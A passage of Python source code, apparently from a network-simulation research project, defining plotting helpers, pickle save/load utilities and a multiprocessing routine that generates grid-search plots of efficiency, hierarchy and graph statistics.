if verbose:
print(f'\n gif and mp4 of network grid search created in {vid_path} \n Stills stored in {fig_path} \n')
print(f"Time lapsed {utility_funcs.time_lapsed_h_m_s(time.time() - start_time)}")
"""
# 2D Plotting: ------------------------------------------------------------------------------------------------------
def plot_2d_data(data, xlabel=None, ylabel=None, color=None, plot_limits=None, show=False, fig_title=None, title=False):
fig = plt.figure(figsize=(10, 8))
if plot_limits is not None:
if plot_limits[0]: plt.xlim(*plot_limits[0])
if plot_limits[1]: plt.ylim(*plot_limits[1])
if xlabel is not None:
plt.xlabel(xlabel)
if ylabel is not None:
plt.ylabel(ylabel)
x, y = data[:, 0], data[:, 1]
plt.scatter(x, y, c=color, cmap='viridis')
    if fig_title:
        plt.title(f'{fig_title}')
    if title:
        plt.savefig(f'{title}.png')
    if show:
        plt.show()
plt.close(fig)
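# Usage sketch (hedged): plot_2d_data simply scatters column 0 against column 1, optionally colour-coded; this is how
# the efficiency-coordinate plots in grid_search_plots below use it:
#   plot_2d_data(np.array(efficiency_coordinates), xlabel='Diffusion Efficiency', ylabel='Routing Efficiency',
#                plot_limits=[[0, 2], [0, 2]], show=True)
# where `efficiency_coordinates` is any (n, 2) array of (diffusion, routing) efficiency pairs.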
# 3D Plotting: ------------------------------------------------------------------------------------------------------
def plot_3d(function, x_range, y_range=None, piecewise=False, z_limits=None, spacing=0.05):
"""
Basic plotter for a 3d function, with the function to be given explicitly as z(x, y), along with the relevant x range.
:param function: z(x,y)
:param x_range: [lower bound, upper bound]
:param y_range: defaults to x_range, otherwise list as [lower bound, upper bound]
:param piecewise: set true if function is piecewise (i.e. contains conditional)
:param z_limits: [lower bound, upper bound]
:param spacing: interval between both x and y ranges.
"""
if y_range is None:
y_range = x_range
fig = plt.figure(figsize=(10, 8))
ax = fig.gca(projection='3d')
X = np.arange(x_range[0], x_range[1], spacing)
Y = np.arange(y_range[0], y_range[1], spacing)
if piecewise:
Z = np.zeros((len(X), len(Y)))
for i in range(len(X)):
for j in range(len(Y)):
Z[i][j] = function(X[i], Y[j])
X, Y = np.meshgrid(X, Y)
else:
X, Y = np.meshgrid(X, Y)
Z = function(X, Y)
surf = ax.plot_surface(X, Y, Z, cmap=cm.winter, linewidth=0, antialiased=False)
if z_limits:
ax.set_zlim(z_limits[0], z_limits[1])
ax.set_xlabel('Effective Distance')
ax.set_ylabel('Edge Value')
ax.set_zlabel('Info Score')
# ax.set_xlabel('x')
# ax.set_ylabel('y')
# ax.set_zlabel('z')
plt.show()
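# Usage sketch (hedged): plot_3d renders an explicit z(x, y); self-contained examples with made-up surfaces would be:
#   plot_3d(lambda x, y: np.exp(-x) * y, x_range=[0, 2], y_range=[0, 1], z_limits=[0, 1], spacing=0.05)
#   plot_3d(lambda x, y: x if x > y else y, x_range=[0, 1], piecewise=True)  # piecewise=True evaluates pointwise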
def general_3d_data_plot(data, xlabel=None, ylabel=None, zlabel=None, plot_limits=None, color=None, plot_projections=False, projections=False, fig_title=None, show=False, title=False):
# :param plot_limits: give as a list of lists of limits, i.e. [[x_min, x_max], [y_min, y_max], [z_min, z_max]]
cmap = 'viridis'
if xlabel == 'Treeness' or xlabel == 'treeness':
xdata, ydata, zdata = data[:, 2], data[:, 1], data[:, 0]
else:
xdata, ydata, zdata = data[:, 0], data[:, 1], data[:, 2]
fig = plt.figure(figsize=(10, 10))
if xlabel is not None:
x_label = xlabel
else:
x_label = 'X'
if ylabel is not None:
y_label = ylabel
else:
y_label = 'Y'
if zlabel is not None:
z_label = zlabel
else:
z_label = 'Z'
if plot_projections:
gs = gridspec.GridSpec(3, 3, wspace=0.3)
ax = fig.add_subplot(gs[:2, :], projection='3d')
# norm = matplotlib.colors.Normalize(vmin=0, vmax=100)
ax.scatter(xdata, ydata, zdata, cmap=cmap, c=color) #, norm=norm)
ax.set_xlabel(x_label)
ax.set_ylabel(y_label)
ax.set_zlabel(z_label)
if plot_limits is not None:
if plot_limits[0]: ax.set_xlim3d(*plot_limits[0])
if plot_limits[1]: ax.set_ylim3d(*plot_limits[1])
if plot_limits[2]: ax.set_zlim3d(*plot_limits[2])
ax1 = fig.add_subplot(gs[2, 0])
ax1.scatter(xdata, ydata, cmap=cmap, c=color)
plt.grid(True)
ax1.set_xlabel(x_label)
ax1.set_ylabel(y_label)
ax2 = fig.add_subplot(gs[2, 1])
ax2.scatter(xdata, zdata, cmap=cmap, c=color)
plt.grid(True)
ax2.set_xlabel(x_label)
ax2.set_ylabel(z_label)
ax3 = fig.add_subplot(gs[2, 2])
ax3.scatter(ydata, zdata, cmap=cmap, c=color)
plt.grid(True)
ax3.set_xlabel(y_label)
ax3.set_ylabel(z_label)
fig.align_labels()
        if fig_title:
            ax.set_title(f'{fig_title}')
        if title:
            plt.savefig(f'{title}.png')
        if show:
            plt.show()
        plt.close()
else:
ax = fig.add_subplot(111, projection='3d')
# norm = matplotlib.colors.Normalize(vmin=0, vmax=100)
ax.scatter(xdata, ydata, zdata, cmap=cmap, c=color) #, norm=norm)
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
ax.set_zlabel(zlabel)
if plot_limits is not None:
if plot_limits[0]: ax.set_xlim3d(*plot_limits[0])
if plot_limits[1]: ax.set_ylim3d(*plot_limits[1])
if plot_limits[2]: ax.set_zlim3d(*plot_limits[2])
if projections:
ax.plot(xdata, zdata, 'r+', zdir='y', zs=1)
ax.plot(ydata, zdata, 'g+', zdir='x', zs=0)
ax.plot(xdata, ydata, 'k+', zdir='z', zs=-1)
        if fig_title:
            plt.title(f'{fig_title}')
        if title:
            plt.savefig(f'{title}.png')
        if show:
            plt.show()
plt.close()
def plot_3d_data(three_d_data, x_range=None, y_range=None, z_range=None, show=False, raw_fig_title=None):
"""
Plots 3d data (np.dim=3)
:param three_d_data: 3 dimensional data to be plotted.
    :param raw_fig_title: determines the title (presumably prefixed with a dir_path) of the fig's raw pickled (saved) form, to allow for loading via another python program later,
    as 3d matplotlib objects cannot be reopened by other software.
"""
fig = plt.figure(figsize=(10, 8))
ax = fig.add_subplot(111, projection='3d')
data = np.swapaxes(np.swapaxes(three_d_data, 0, 1), 1, 2) # sliding node_num axis to last
xs = np.repeat(x_range, data.shape[1] * data.shape[2], axis=0).flatten()
ys = np.repeat([y_range], data.shape[0] * data.shape[2], axis=0).flatten()
zs = np.repeat([z_range], data.shape[0] * data.shape[1], axis=0).flatten()
print(f'data.shape {data.shape}')
data = np.round(data.flatten(), 6)
# print(f'xs: ys: zs: \n {xs}, \n {ys}, \n {zs}')
# print(f'xs.size, ys.size, zs.size, data.size: {xs.size}, {ys.size}, {zs.size}, {data.size}')
logged_data = np.log(abs(data))
# TODO: here the questionable assumption of the data being entirely positive/negative is used. FIX
    img = ax.scatter(xs, ys, zs, c=logged_data, cmap='winter')  # plt.winter() only sets the current colormap and returns None, so pass the colormap name directly
fig.colorbar(img)
ax.set_xlabel('Coupling')
ax.set_ylabel('Adaptation')
ax.set_zlabel('Nodes')
if show:
plt.show()
if raw_fig_title:
        save_object(fig, str(raw_fig_title) + ".pkl")  # pickle the populated figure rather than a new, empty one
def three_d_plot_from_data(path_to_data_dir, edge_conservation_range, selectivity_range, normalized=False, output_dir=None):
"""
Renders a 3D plot from data, as when completing a 3D grid-search, with coloration of data points to indicate 4D data
Presently, plots: average neighbor variance and effective distance differences
    :param path_to_data_dir: string, path to data directory
:param edge_conservation_range: floats; np.array, full range of values for edge conservation (coupling)
:param selectivity_range: floats; np.array, full sequence of selectivity values
:param normalized: bool, optional amax normalization of variance and effective distance differences
:param output_dir: string, output directory
"""
if output_dir is None:
output_dir = path_to_data_dir
eff_dists_all_nodes = np.zeros((1, edge_conservation_range.size, selectivity_range.size))
ave_nbr_var_all_nodes = np.zeros((1, edge_conservation_range.size, selectivity_range.size))
eff_dist_diffs_flattened = []
ave_nbr_var_flattened = []
node_nums = []
node_files = []
sub_dirs = sorted([dirs[0] for dirs in os.walk(path_to_data_dir) if dirs[0] != str(path_to_data_dir)])
for sub_dir in sub_dirs:
node_nums.append(int(str(str(sub_dir).split('/')[-1]).split('_')[-1]))
tmp_data_files = [files[2] for files in os.walk(Path(path_to_data_dir, sub_dir))]
node_files.append(sorted(tmp_data_files[0]))
node_files = np.array(node_files)
for node_index in range(node_files.shape[0]):
for file_index in range(node_files.shape[1]):
with open(Path(sub_dirs[node_index], node_files[node_index][file_index]), 'rb') as input:
G = pickle.load(input)
input.close()
last_ave_nbr_deg = list(nx.average_neighbor_degree(G.convert_to_nx_graph(timestep=-1), source='in', target='in', weight='weight').values())
ave_nbr_var_flattened.append(np.array(last_ave_nbr_deg).var())
eff_dist_diffs_flattened.append(G.eff_dist_diff(multiple_path_eff_dist=False)) # Compares first and last eff_dist values
eff_dists_all_nodes = np.vstack((eff_dists_all_nodes, [np.array(eff_dist_diffs_flattened).reshape(edge_conservation_range.size, selectivity_range.size)]))
ave_nbr_var_all_nodes = np.vstack((ave_nbr_var_all_nodes, [np.array(ave_nbr_var_flattened).reshape(edge_conservation_range.size, selectivity_range.size)]))
eff_dist_diffs_flattened = []
ave_nbr_var_flattened = []
eff_dists_all_nodes = np.delete(eff_dists_all_nodes, 0, axis=0)
ave_nbr_var_all_nodes = np.delete(ave_nbr_var_all_nodes, 0, axis=0)
if normalized:
eff_dists_all_nodes /= np.amax(eff_dists_all_nodes)
ave_nbr_var_all_nodes /= np.amax(ave_nbr_var_all_nodes)
plot_3d_data(eff_dists_all_nodes, x_range=edge_conservation_range, y_range=selectivity_range, z_range=np.array(node_nums), raw_fig_title=Path(output_dir, "Eff_dist_diff_Grid_Search"))
plot_3d_data(ave_nbr_var_all_nodes, x_range=edge_conservation_range, y_range=selectivity_range, z_range=np.array(node_nums), raw_fig_title=Path(output_dir, "Ave_nbr_var_Grid_Search"))
# System Functions: -------------------------------------------------------------------------------------------------
def save_object(obj, filename):
"""
Saves object as pickle extension for future retrieval via another python program
:param obj: (python) Object to be saved
:param filename: Name of saved object
"""
with open(filename, 'wb') as output: # Overwrites any existing file.
pickle.dump(obj, output, pickle.HIGHEST_PROTOCOL)
del obj
def open_graph_obj(path, graph_id):
"""
    Opens a graph object, provided it was saved with the '{graph_id}_graph_obj.pkl' filename format.
:param path: abs path to (.pkl) file
:param graph_id: id as string (e.g. '0012')
:return: [graph] class object
"""
with open(Path(path, f'{graph_id}_graph_obj.pkl'), 'rb') as input:
return pickle.load(input)
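# Usage sketch (hedged): round-tripping a simulated Graph object with the helpers above, assuming the
# '{graph_id}_graph_obj.pkl' naming convention used throughout the grid-search output directories:
#   save_object(G, '0012_graph_obj.pkl')
#   G_reloaded = open_graph_obj('.', '0012')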
def open_figure(path, filename):
# TODO: Evidently does not work with present implementation of matplotlib for interactive plots (e.g. 4d heatmap)
if filename.endswith('.pkl'):
with open(Path(path, filename), 'rb') as fig:
ax = pickle.load(fig)
else:
with open(Path(path, (str(filename)+'.pkl')), 'rb') as fig:
ax = pickle.load(fig)
plt.show()
# Grid Search: ------------------------------------------------------------------------------------------------------
def grid_search_plots(data_directory, edge_conservation_range, selectivity_range, num_nodes, source_reward=2.6, eff_dist=False, global_eff_dist=False, network_graphs=False, node_plots=False, ave_nbr=False, cluster_coeff=False, shortest_path=False, degree_dist=False, edge_dist=False, meta_plots=True, null_sim=False, interpolate=None, output_dir=None):
"""
    Creates all plots for a given grid-search dataset (sub)directory and puts the results in new, appropriately named subdirectories. Meta-plots are controlled by graph initialization.
# Parallelization implementation ensures completion of all plots per dataset (or as many as supportable by the number of cpu cores) before continuing to the following set
:param data_directory: string; Path obj, path to data directory
:param edge_conservation_range: float; np.arange, full sequence of edge_conservation values
:param selectivity_range: float; np.arange, full sequence of selectivity values
:param num_nodes: int number of nodes used in simulation -> graph generation. (iterated over via shell command for node num grid-search)
:param ave_nbr: bool; determines if average neighbor degree plots are created
:param cluster_coeff: bool; determines if cluster coefficient plots are created
:param shortest_path: bool; determines if shortest path plots are created
:param degree_dist: bool; determines if degree distribution plots are created
:param output_dir: string; path obj. Determines output directory, defaults to data directory
"""
start_time = time.time()
# assert eff_dist or global_eff_dist or network_graphs or node_plots or ave_nbr or cluster_coeff or shortest_path or degree_dist or edge_dist, 'Choose something to plot'
if output_dir is None:
output_dir = data_directory.parents[0]
grid_search_plots_dir = output_dir
if eff_dist: eff_dist_path = Path(grid_search_plots_dir, 'eff_dist_plots')
if network_graphs: graph_path = Path(grid_search_plots_dir, 'network_graphs')
if node_plots: node_path = Path(grid_search_plots_dir, 'node_plots')
if ave_nbr: neighbor_path = Path(grid_search_plots_dir, 'ave_neighbor_plots')
if cluster_coeff: cluster_coeff_path = Path(grid_search_plots_dir, 'cluster_coefficients_plots')
if shortest_path: shortest_paths_path = Path(grid_search_plots_dir, 'shortest_paths_plots')
if degree_dist: degree_dist_path = Path(grid_search_plots_dir, 'degree_dist_plots')
if edge_dist: edge_dist_path = Path(grid_search_plots_dir, 'edge_dist_plots')
if global_eff_dist: all_to_all_eff_dist_path = Path(grid_search_plots_dir, 'global_eff_dist_plots')
try:
if eff_dist: os.makedirs(eff_dist_path), f'Created folder for graphs at {eff_dist_path}'
if network_graphs: os.makedirs(graph_path), f'Created folder for graphs at {graph_path}'
if node_plots: os.makedirs(node_path), f'Created folder for node plots at {node_path}'
if ave_nbr: os.makedirs(neighbor_path), f'Created folder for neighbor graph at {neighbor_path}'
if cluster_coeff: os.makedirs(cluster_coeff_path), f'Created folder for cluster coeff graphs at {cluster_coeff_path}'
if shortest_path: os.makedirs(shortest_paths_path), f'Created folder for shortest path graphs at {shortest_paths_path}'
if degree_dist: os.makedirs(degree_dist_path), f'Created folder for degree distribution graphs at {degree_dist_path}'
if edge_dist: os.makedirs(edge_dist_path), f'Created folder for degree distribution graphs at {edge_dist_path}'
if global_eff_dist: os.makedirs(all_to_all_eff_dist_path), f'Created folder for global eff dist graphs at {all_to_all_eff_dist_path}'
except OSError:
print(f'{grid_search_plots_dir} already exists, adding or overwriting contents')
pass
cores_used = mp.cpu_count() - 3
run_counter = 0
f = []
eff_dist_diffs_flattened = []
mean_eff_dist_diffs_flattened = []
global_eff_dist_diffs_flattened = []
log_degree_dist_var_flattened = []
ave_nbr_var_flattened = []
ave_cluster_flattened = []
ave_shortest_path_flattened = []
efficiency_coordinates = []
linear_threshold_hierarchy_coordinates = []
exp_threshold_hierarchy_coordinates = []
def meta_plot_data_compiler():
if not null_sim:
if G.observed_observables['eff_dist_diff']: eff_dist_diffs_flattened.append(G.source_eff_dist_diff)
if G.observed_observables['mean_eff_dist']: mean_eff_dist_diffs_flattened.append(G.mean_eff_dist)
if G.observed_observables['global_eff_dist_diff']: global_eff_dist_diffs_flattened.append(G.global_eff_dist_diff)
if G.observed_observables['ave_nbr']: ave_nbr_var_flattened.append(G.ave_nbr_var)
if G.observed_observables['degree_dist']: log_degree_dist_var_flattened.append(G.degree_dist)
if G.observed_observables['cluster_coeff']: ave_cluster_flattened.append(G.ave_cluster_coeff)
if G.observed_observables['shortest_path']: ave_shortest_path_flattened.append(G.ave_shortest_path)
if G.observed_observables['efficiency_coordinates']: efficiency_coordinates.append(G.efficiency_coordinates)
if G.observed_observables['hierarchy_coordinates']:
linear_threshold_hierarchy_coordinates.append(G.linear_threshold_hierarchy_coordinates)
exp_threshold_hierarchy_coordinates.append(G.exp_threshold_hierarchy_coordinates)
for __, __, files in os.walk(data_directory):
f = sorted(files) # Order preserved due to 0 padding.
assert len(f) == edge_conservation_range.size * selectivity_range.size, f"Not as many files as parameter combinations: \n num_files: {len(f)}, edge_conservation_range.size * selectivity_range.size {edge_conservation_range.size * selectivity_range.size}"
for edge_conservation_val in edge_conservation_range:
selectivity_range_iter = iter(range(selectivity_range.size))
for selectivity_val_index in selectivity_range_iter:
used_cores = 0
selectivity_vals_per_full_cpu = 0
processes = []
left_over_selectivity_values = selectivity_range.size - selectivity_val_index
if left_over_selectivity_values < cores_used: # To ensure that parallelization persists when there are fewer tasks than cores
while selectivity_vals_per_full_cpu < left_over_selectivity_values:
with open(Path(data_directory, f[run_counter]), 'rb') as data:
G = pickle.load(data)
data.close()
# all args must be given for Process runs.
if eff_dist:
p_1 = mp.Process(target=plot_eff_dist, args=(G, False, False, False, True, False, False, Path(eff_dist_path, f'{run_counter:03}_eff_dist_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}'), source_reward, 1, False))
p_1.start()
processes.append(p_1)
used_cores += 1
if network_graphs:
if num_nodes > 20: # prints end graphs alone for larger node values.
p_2 = mp.Process(target=plot_single_network, args=(G, -1, True, 200, False, None, False, False, null_sim, Path(graph_path, f'{run_counter:03}_graph_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_2.start()
else:
p_2 = mp.Process(target=plot_network, args=(G, True, 200, False, null_sim, False, False, Path(graph_path, f'{run_counter:03}_graph_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_2.start()
processes.append(p_2)
used_cores += 1
if node_plots:
p_3 = mp.Process(target=plot_node_values, args=(G, 'all', False, False, Path(node_path, f'{run_counter:03}_node_values_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_3.start()
processes.append(p_3)
used_cores += 1
if ave_nbr or cluster_coeff or shortest_path:
nx_graphs = G.convert_history_to_list_of_nx_graphs()
if ave_nbr:
p_4 = mp.Process(target=plot_ave_neighbor_degree, args=(nx_graphs, 'in', 'in', False, False, False,
Path(neighbor_path,
f'{run_counter:03}_neighbor_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_4.start()
processes.append(p_4)
used_cores += 1
if cluster_coeff:
p_5 = mp.Process(target=plot_clustering_coefficients, args=(nx_graphs, False, False, False, False,
Path(cluster_coeff_path,
f'{run_counter:03}_cluster_coeffs_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_5.start()
processes.append(p_5)
used_cores += 1
if shortest_path:
p_6 = mp.Process(target=plot_shortest_path_length, args=(nx_graphs, False, False,
Path(shortest_paths_path,
f'{run_counter:03}_shortest_path_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_6.start()
processes.append(p_6)
used_cores += 1
if degree_dist:
p_7 = mp.Process(target=plot_degree_histogram, args=(G, False, -1, False, False,
Path(degree_dist_path,
f'{run_counter:03}_degree_dist_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_7.start()
processes.append(p_7)
used_cores += 1
if edge_dist:
p_8 = mp.Process(target=plot_edge_histogram, args=(G, False, -1, False, False, Path(edge_dist_path, f'{run_counter:03}_edge_dist_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_8.start()
processes.append(p_8)
used_cores += 1
if global_eff_dist:
p_9 = mp.Process(target=plot_eff_dist, args=(G, True, False, False, True, False, False, Path(all_to_all_eff_dist_path, f'{run_counter:03}_global_eff_dist_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}'), source_reward, 1, False))
p_9.start()
processes.append(p_9)
used_cores += 1
run_counter += 1 # Also serves as file index
selectivity_vals_per_full_cpu += 1
if meta_plots:
meta_plot_data_compiler()
# debug_counter += 1
utility_funcs.consume(selectivity_range_iter, left_over_selectivity_values - 1) # -1 because the iteration forwards 1 step still proceeds directly after
else:
while selectivity_vals_per_full_cpu < cores_used:
with open(Path(data_directory, f[run_counter]), 'rb') as data:
G = pickle.load(data)
data.close()
if eff_dist:
p_1 = mp.Process(target=plot_eff_dist, args=(G, False, False, False, True, False, False, Path(eff_dist_path, f'{run_counter:03}_eff_dist_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}'), source_reward, 1, False))
p_1.start()
processes.append(p_1)
used_cores += 1
if network_graphs:
if num_nodes > 20: # prints end graphs alone for larger node values.
p_2 = mp.Process(target=plot_single_network, args=(G, -1, True, 200, False, None, False, False, null_sim, Path(graph_path, f'{run_counter:03}_graph_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_2.start()
else:
p_2 = mp.Process(target=plot_network, args=(G, True, 200, False, null_sim, False, False, Path(graph_path, f'{run_counter:03}_graph_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_2.start()
processes.append(p_2)
used_cores += 1
if node_plots:
p_3 = mp.Process(target=plot_node_values, args=(G, 'all', False, False, Path(node_path, f'{run_counter:03}_node_values_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_3.start()
processes.append(p_3)
used_cores += 1
if degree_dist:
p_7 = mp.Process(target=plot_degree_histogram, args=(G, False, -1, False, False,
Path(degree_dist_path,
f'{run_counter:03}_degree_dist_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_7.start()
processes.append(p_7)
used_cores += 1
if edge_dist:
p_8 = mp.Process(target=plot_edge_histogram, args=(G, False, -1, False, False, Path(edge_dist_path, f'{run_counter:03}_edge_dist_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_8.start()
processes.append(p_8)
used_cores += 1
if global_eff_dist:
p_9 = mp.Process(target=plot_eff_dist, args=(G, True, False, False, True, False, False, Path(all_to_all_eff_dist_path, f'{run_counter:03}_global_eff_dist_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}'), source_reward, 1, False))
p_9.start()
processes.append(p_9)
used_cores += 1
if ave_nbr or cluster_coeff or shortest_path:
nx_graphs = G.convert_history_to_list_of_nx_graphs()
if ave_nbr:
p_4 = mp.Process(target=plot_ave_neighbor_degree, args=(nx_graphs, 'in', 'in', False, False, False,
Path(neighbor_path,
f'{run_counter:03}_neighbor_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_4.start()
processes.append(p_4)
used_cores += 1
if cluster_coeff:
p_5 = mp.Process(target=plot_clustering_coefficients, args=(nx_graphs, False, False, False, False,
Path(cluster_coeff_path,
f'{run_counter:03}_cluster_coeffs_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_5.start()
processes.append(p_5)
used_cores += 1
if shortest_path:
p_6 = mp.Process(target=plot_shortest_path_length, args=(nx_graphs, False, False,
Path(shortest_paths_path,
f'{run_counter:03}_shortest_path_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_6.start()
processes.append(p_6)
used_cores += 1
run_counter += 1 # Also serves as file index
selectivity_vals_per_full_cpu += 1
if meta_plots:
meta_plot_data_compiler()
# debug_counter += 1
utility_funcs.consume(selectivity_range_iter, cores_used - 1) # Advances skew iter cpu count iterations
for process in processes:
process.join() # join's created processes to run simultaneously.
if meta_plots:
        ave_nbr_vars = np.array(ave_nbr_var_flattened).reshape(edge_conservation_range.size, selectivity_range.size)
        if np.min(ave_nbr_vars) <= 0:  # np.argmin returns an index (never negative); guard on the values instead
            min_nbr_var = np.min(ave_nbr_vars[ave_nbr_vars > 0])  # smallest strictly positive variance
            ave_nbr_vars = np.where(ave_nbr_vars > 0, ave_nbr_vars, min_nbr_var)  # replace non-positive entries element-wise
color_map = [int(i*255/selectivity_range.size) for i in np.arange(selectivity_range.size, 0, -1)]*int(edge_conservation_range.size) # color scale by selectivity value reversed
edge_conservation_color_map = np.array([[int(i * 255 / edge_conservation_range.size)] * int(selectivity_range.size) for i in np.arange(edge_conservation_range.size, 0, -1)]).flatten() # color scale by edge conservation value reversed
plot_limits = [[-1, 1], [0, 1], [0, 1]]
general_3d_data_plot(data=np.array(linear_threshold_hierarchy_coordinates), xlabel="Treeness", ylabel="Feedforwardness",
zlabel="Orderability", color=color_map, plot_limits=plot_limits, plot_projections=True,
fig_title='Hierarchy Coordinates (Linear Thresholds)',
title=Path(grid_search_plots_dir, 'Hierarchy_Coordinates_[Linear_Thresholds]'))
general_3d_data_plot(data=np.array(exp_threshold_hierarchy_coordinates), xlabel="Treeness",
ylabel="Feedforwardness", zlabel="Orderability", color=color_map, plot_limits=plot_limits,
plot_projections=True, fig_title='Hierarchy Coordinates (Exponential Thresholds)',
title=Path(grid_search_plots_dir, 'Hierarchy_Coordinates_[Exponential_Thresholds]'))
general_3d_data_plot(data=np.array(linear_threshold_hierarchy_coordinates), xlabel="Treeness", ylabel="Feedforwardness",
zlabel="Orderability", color=edge_conservation_color_map, plot_limits=plot_limits, plot_projections=True,
fig_title='Hierarchy Coordinates (Linear Thresholds)',
title=Path(grid_search_plots_dir, 'Hierarchy_Coordinates_[Linear_Thresholds_Colored_via_Edge_Conservation]'))
general_3d_data_plot(data=np.array(exp_threshold_hierarchy_coordinates), xlabel="Treeness",
ylabel="Feedforwardness", zlabel="Orderability", color=edge_conservation_color_map, plot_limits=plot_limits,
plot_projections=True, fig_title='Hierarchy Coordinates (Exponential Thresholds)',
title=Path(grid_search_plots_dir, 'Hierarchy_Coordinates_[Exponential_Thresholds_Colored_via_Edge_Conservation]'))
if efficiency_coordinates:
scaling = 2
cropped_diff_eff = utility_funcs.crop_outliers(np.array(efficiency_coordinates)[:, 0], std_multiple_cutoff=2)
cropped_rout_eff = utility_funcs.crop_outliers(np.array(efficiency_coordinates)[:, 1], std_multiple_cutoff=1)
diff_eff_std, diff_eff_mean = np.std(cropped_diff_eff), np.mean(cropped_diff_eff)
rout_eff_std, rout_eff_mean = np.std(cropped_rout_eff), np.mean(cropped_rout_eff)
x_eff_lim = [diff_eff_mean - (scaling * diff_eff_std), diff_eff_mean + (scaling * diff_eff_std)]
y_eff_lim = [rout_eff_mean - (scaling * rout_eff_std), rout_eff_mean + (scaling * rout_eff_std)]
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency",
color=color_map, plot_limits=[x_eff_lim, y_eff_lim], fig_title="Diffusion vs Routing Efficiency",
title=Path(grid_search_plots_dir, 'Efficiency_Scores_wo_outliers'))
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency", color=color_map, plot_limits=[[0, 2], [0, 2]], fig_title="Diffusion vs Routing Efficiency", title=Path(grid_search_plots_dir, 'Efficiency_Scores_Around_1'))
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency", color=color_map, fig_title="Diffusion vs Routing Efficiency", title=Path(grid_search_plots_dir, 'Efficiency_Scores'))
# Efficiency Coordinates color coded via edge conservation value (darker means higher edge conservation)
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency", color=edge_conservation_color_map, plot_limits=[x_eff_lim, y_eff_lim], fig_title="Diffusion vs Routing Efficiency", title=Path(grid_search_plots_dir, 'Efficiency_Scores_wo_outliers_[Colored_by_Edge_Conservation]'))
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency", color=edge_conservation_color_map, plot_limits=[[0, 2], [0, 2]], fig_title="Diffusion vs Routing Efficiency", title=Path(grid_search_plots_dir, 'Efficiency_Scores_Around_1_[Colored_by_Edge_Conservation]'))
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency", color=edge_conservation_color_map, fig_title="Diffusion vs Routing Efficiency", title=Path(grid_search_plots_dir, 'Efficiency_Scores_[Colored_by_Edge_Conservation]'))
# Efficiency Heatmaps:
diffusion_efficiencies, routing_efficiencies = np.array(efficiency_coordinates)[:, 0], np.array(efficiency_coordinates)[:, 1]
plot_heatmap(np.array(diffusion_efficiencies).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, f'E_diff_heatmap'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Diffusion Efficiency')
# plot_heatmap(np.array(np.log(diffusion_efficiencies)).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, f'ln_E_diff_heatmap'), x_range=selectivity_range, y_range=edge_conservation_range, interp_method=interpolate, normalize=False, fig_title='Ln Diffusion Efficiency')
